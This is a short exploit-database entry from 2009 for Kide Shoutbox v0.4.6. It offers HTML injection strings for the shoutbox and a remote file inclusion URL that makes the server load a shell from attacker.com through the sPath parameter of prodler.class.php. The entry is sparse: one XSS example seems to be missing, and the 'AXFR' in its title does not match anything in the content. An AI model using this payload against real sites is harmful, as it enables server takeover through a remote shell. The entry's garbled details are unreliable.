id: 10063
date: 12/02/2009
title: Kide Shoutbox v0.4.6 XSS & AXFR
author: andresg888
cves: 

===============================
Kide Shoutbox v0.4.6 XSS & AXFR
===============================

########################################################################
#Exploit :
# Go to the shoutbox and type:
# <font color="red">red text</font>
# or
# <marquee>hi</marquee>
# or
#
########################################################################
#3xplo!t :
#http://server/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt???
########################################################################


#  0day.today [2023-03-23]  #